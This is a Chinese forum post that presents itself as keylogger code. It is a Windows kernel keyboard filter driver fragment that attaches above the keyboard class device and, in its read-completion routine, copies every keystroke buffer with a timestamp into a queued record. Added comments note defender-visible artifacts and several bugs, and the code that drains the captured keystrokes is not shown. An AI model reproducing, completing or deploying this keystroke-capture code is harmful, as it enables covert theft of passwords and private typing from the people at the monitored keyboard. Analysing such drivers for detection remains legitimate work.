发段键盘记录代码吧,大牛们别笑啊
/*
 * Keyboard-class filter driver fragment, as posted. Three routines:
 *   CreateKeyboardObj      - creates an unnamed filter device and attaches it
 *                            above \Device\KeyboardClass0.
 *   KeyboardRead           - forwards a read IRP down the stack with a
 *                            completion routine armed.
 *   KeyboardReadCompletion - copies each completed read's KEYBOARD_INPUT_DATA
 *                            into a RECORD_EVENT and queues it on EventList.
 *
 * Declared elsewhere (not visible here): PKEYBOARD_EXTENSION and its members
 * pFilterDeviceObject/TargetDeviceObject, IO_INF/PIO_INF, RECORD_EVENT/
 * PRECORD_EVENT (ListEntry, Len, EventData), REQ_KEYBOARD, g_bStartMon,
 * EventList and EventListLock, plus whatever drains EventList.
 *
 * Defender's view: the artifacts this code leaves are an extra, unnamed
 * device object of type FILE_DEVICE_KEYBOARD attached to the keyboard class
 * device stack, and kernel debug output prefixed "EventRec.SYS". Which IRP
 * major functions KeyboardRead is registered for is set outside this
 * fragment.
 */

/*
 * Create the filter device and attach it on top of \Device\KeyboardClass0.
 *
 * DriverObj:               driver object handed to IoCreateDevice.
 * RegtryPath:              not used by this routine.
 * PtrReturnedDeviceObject: never written here, so the caller does not get
 *                          the created device object back through it.
 *
 * Returns the NTSTATUS of the step that failed, except that an
 * IoCreateDevice failure is reported as STATUS_SUCCESS (see below).
 */
NTSTATUS CreateKeyboardObj(IN PDRIVER_OBJECT DriverObj, IN PUNICODE_STRING RegtryPath,PDEVICE_OBJECT* PtrReturnedDeviceObject)
{
    NTSTATUS NtStatus = STATUS_SUCCESS;
    PDEVICE_OBJECT pDeviceObject = NULL, pFilteredDevice = NULL;   /* pFilteredDevice is never used */
    UNICODE_STRING usDeviceToFilter;
    PDEVICE_OBJECT pTargetDeviceObject = NULL;
    PFILE_OBJECT pTargetFileObject = NULL;
    PKEYBOARD_EXTENSION pDevExt;

    /* usDeviceToFilter.Buffer points at the literal below; nothing is allocated. */
    RtlInitUnicodeString(&usDeviceToFilter, L"\\Device\\KeyboardClass0");

    /* Resolve the keyboard class device; the file object comes back referenced
     * and is released with ObDereferenceObject on every path below. */
    NtStatus = IoGetDeviceObjectPointer( IN &usDeviceToFilter, IN FILE_ALL_ACCESS, OUT &pTargetFileObject, OUT &pTargetDeviceObject );
    if( !NT_SUCCESS(NtStatus) ) {
        DbgPrint(("EventRec.SYS:: Couldn't Get the Keyboard Device Object\n"));
        pTargetFileObject = NULL;
        pTargetDeviceObject = NULL;
        return( NtStatus );
    }
    DbgPrint("IoGetDeviceObjectPointer ok!\n");

    /* Unnamed device (NULL name). NOTE(review): sizeof(PKEYBOARD_EXTENSION)
     * is the size of a pointer, yet two pointer-sized members are stored in
     * the extension further down. */
    NtStatus = IoCreateDevice(DriverObj, sizeof(PKEYBOARD_EXTENSION), NULL,
        FILE_DEVICE_KEYBOARD,//pTargetDeviceObject->DeviceType,
        pTargetDeviceObject->Characteristics, FALSE, &pDeviceObject);
    if( !NT_SUCCESS(NtStatus) ) {
        DbgPrint(("EventRec.SYS: failed to create Keyboard filter device!\n"));
        /* NOTE(review): RtlFreeUnicodeString is applied to a string whose
         * Buffer is the literal above, and the failure is then reported to
         * the caller as STATUS_SUCCESS. */
        RtlFreeUnicodeString( &usDeviceToFilter );
        ObDereferenceObject( pTargetFileObject );
        pTargetFileObject = NULL;
        return STATUS_SUCCESS;
    }

    /* Earlier revision allocated the extension separately; now the extension
     * that IoCreateDevice provides is used directly. */
    // pDevExt=ExAllocatePool(NonPagedPool, sizeof( PKEYBOARD_EXTENSION ) );
    // (PKEYBOARD_EXTENSION )( pDeviceObject->DeviceExtension )= pDevExt ;
    pDevExt = (PKEYBOARD_EXTENSION) pDeviceObject->DeviceExtension;
    pDevExt->pFilterDeviceObject = pDeviceObject;
    pDevExt->TargetDeviceObject = pTargetDeviceObject;   /* read by KeyboardRead */
    DbgPrint(("IoCreateDevice: Create Keyboard filter \n"));

    /* Attach above the class device. On failure the filter device is deleted
     * and the file-object reference dropped. The log string below names
     * IoAttachDeviceToDeviceStack, but IoAttachDeviceByPointer is what is
     * called. */
    NtStatus = IoAttachDeviceByPointer(pDeviceObject,pTargetDeviceObject);
    if( !NT_SUCCESS(NtStatus) ) {
        DbgPrint(("EventRec.SYS: Couldn't attach to Keyboard Device Object\n"));
        IoDeleteDevice( pDeviceObject );
        pDeviceObject = NULL;
        ObDereferenceObject( pTargetFileObject );
        pTargetFileObject = NULL;
        pTargetDeviceObject = NULL;
        return( NtStatus );
    }
    DbgPrint(("IoAttachDeviceToDeviceStack: Attach Device OK \n"));

    DbgPrint(("EventRec.SYS: Attach Device\n"));
    /* Mirror the target's type and characteristics so the filter device
     * presents like the device beneath it. The ";;" is a stray empty
     * statement. */
    pDeviceObject->DeviceType = pTargetDeviceObject->DeviceType;
    pDeviceObject->Characteristics = pTargetDeviceObject->Characteristics;
    pDeviceObject->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);;

    /* Release the reference from IoGetDeviceObjectPointer. NOTE(review):
     * whether the target device stays referenced for the attached filter
     * after this release is not established by anything visible here —
     * confirm against the IoGetDeviceObjectPointer contract. */
    DbgPrint(("EventRec.SYS: Before Dereference TargetFileObject \n"));
    ObDereferenceObject( pTargetFileObject );
    pTargetFileObject = NULL;

    return NtStatus;
}

/*
 * Dispatch routine for reads arriving at the filter device (the major
 * function it is registered for is set outside this fragment).
 *
 * Copies the current stack location to the next one, arms
 * KeyboardReadCompletion for success, error and cancel (the three TRUE
 * flags), and passes the IRP to the keyboard class device recorded in the
 * extension by CreateKeyboardObj.
 *
 * Returns whatever IoCallDriver returns.
 */
NTSTATUS KeyboardRead(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    PIO_STACK_LOCATION IrpStack;   /* assigned below but never read */
    // PIO_STACK_LOCATION NextIrpStack;
    PKEYBOARD_EXTENSION pExt;
    NTSTATUS NtStatus = STATUS_SUCCESS;

    // DbgPrint("KeyboardRead Called \r\n");
    pExt = (PKEYBOARD_EXTENSION)DeviceObject->DeviceExtension;
    IrpStack = IoGetCurrentIrpStackLocation(Irp);

    /* Forward unchanged; the completion routine receives no context (NULL). */
    IoCopyCurrentIrpStackLocationToNext(Irp);
    IoSetCompletionRoutine(Irp, (PIO_COMPLETION_ROUTINE) KeyboardReadCompletion, NULL, TRUE, TRUE, TRUE);
    NtStatus = IoCallDriver(pExt->TargetDeviceObject, Irp);
    // DbgPrint("KeyboardRead Exit 0x%0x \r\n", NtStatus);
    return NtStatus;
}

/*
 * Completion routine for reads forwarded by KeyboardRead.
 *
 * When the read completed with STATUS_SUCCESS and g_bStartMon is non-zero,
 * the completed buffer (Irp->AssociatedIrp.SystemBuffer,
 * Irp->IoStatus.Information bytes of KEYBOARD_INPUT_DATA) is copied into a
 * freshly allocated RECORD_EVENT whose EventData is laid out as
 *     IO_INF header | TIME_FIELDS timestamp | raw key data
 * and the record is queued on the global EventList under EventListLock.
 * Otherwise the IRP is passed through untouched.
 *
 * DeviceObject and Context are unused. Always returns STATUS_SUCCESS.
 */
NTSTATUS KeyboardReadCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context)
{
    PIO_INF inf;
    PKEYBOARD_INPUT_DATA KeyData;   /* only used by the commented-out trace */
    ULONG numKey,i;                  /* i is never used */
    NTSTATUS NtStatus = STATUS_SUCCESS;   /* never used */
    ULONG SizeTotal;
    PUCHAR pTmp;
    TIME_FIELDS *timeFields = NULL;
    LARGE_INTEGER Now;
    ULONG len;
    PRECORD_EVENT pEvent;

    // DbgPrint("Keyboard Read Completion OK \n");
    /* Propagate pending status, as a completion routine must. */
    if (Irp->PendingReturned) {
        IoMarkIrpPending(Irp);
    }

    if (Irp->IoStatus.Status==STATUS_SUCCESS && g_bStartMon!=0) {
        PIO_STACK_LOCATION cur;   /* assigned but never read */
        cur = IoGetCurrentIrpStackLocation(Irp);
        KeyData = Irp->AssociatedIrp.SystemBuffer;
        numKey = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
        /* DbgPrint("%d keystrokes ", numKey ); for( i = 0; i < numKey; i++ ) { DbgPrint("ScanCode: 0x%0x ", KeyData.MakeCode ); DbgPrint("Flags: 0x%0x\r\n", KeyData.Flags ); } */

        /* SizeTotal is the payload (header + timestamp + key bytes); len adds
         * the LIST_ENTRY and ULONG that precede EventData — assumes that is
         * RECORD_EVENT's layout, confirm against its declaration. */
        SizeTotal= sizeof(IO_INF)+sizeof(TIME_FIELDS)+Irp->IoStatus.Information;
        len = sizeof(LIST_ENTRY)+sizeof(ULONG)+SizeTotal;
        // DbgPrint("SizeTotal=%x Information=%x ", SizeTotal, Irp->IoStatus.Information);

        /* NOTE(review): the allocation result is not checked before
         * pEvent->EventData is dereferenced below. */
        pEvent = (PRECORD_EVENT)ExAllocatePool(NonPagedPool,len);
        // DbgPrint("%d Keyboard AllocatePool 0x%x INF 0x%x\n",numKey,len,SizeTotal);

        /* Header. */
        inf = (PIO_INF)(pEvent->EventData);
        inf->type=REQ_KEYBOARD;
        inf->SizeCopied=Irp->IoStatus.Information;
        inf->SizeTotal=SizeTotal;

        /* Timestamp, written in place right after the header. */
        pTmp= pEvent->EventData+sizeof(IO_INF);
        timeFields=(TIME_FIELDS *)(pTmp);
        KeQuerySystemTime(&Now);
        RtlTimeToTimeFields(&Now, timeFields);

        /* Raw key data, copied verbatim from the completed system buffer. */
        pTmp=pEvent->EventData+sizeof(IO_INF)+sizeof(TIME_FIELDS);
        if(inf->SizeCopied) {
            RtlCopyMemory(pTmp,Irp->AssociatedIrp.SystemBuffer,inf->SizeCopied);
        }

        /* Len records the payload size (SizeTotal), not the allocation
         * length (len). The consumer that drains EventList is not part of
         * this fragment. */
        pEvent->Len = SizeTotal;
        ExInterlockedInsertTailList(&EventList, &(pEvent->ListEntry),&EventListLock);
        // DbgPrint("Keyboard Compeltion OK\n");
    }
    return STATUS_SUCCESS;
}